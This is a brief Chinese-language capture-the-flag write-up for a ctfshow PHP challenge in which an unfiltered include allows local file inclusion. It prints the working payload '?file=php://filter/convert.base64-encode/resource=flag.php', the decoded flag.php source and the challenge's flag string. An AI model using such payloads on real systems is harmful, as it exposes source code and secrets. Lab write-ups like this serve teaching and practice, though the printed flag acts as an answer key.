初始化界面:
通过分析,此处未进行任何的过滤
这里有个include
文件包含。利用Filter机制,构造
php://filter/convert.base64-encode/resource=×××
的攻击数据读取文件,拿到各种文件的源码
payload:
?file=php://filter/convert.base64-encode/resource=flag.php
将得到的base64字符串进行base64解码 :
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:55:11
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{fa08f72a-9d42-4ec4-a383-1dd04cfebf2d}";
将flag提交结束!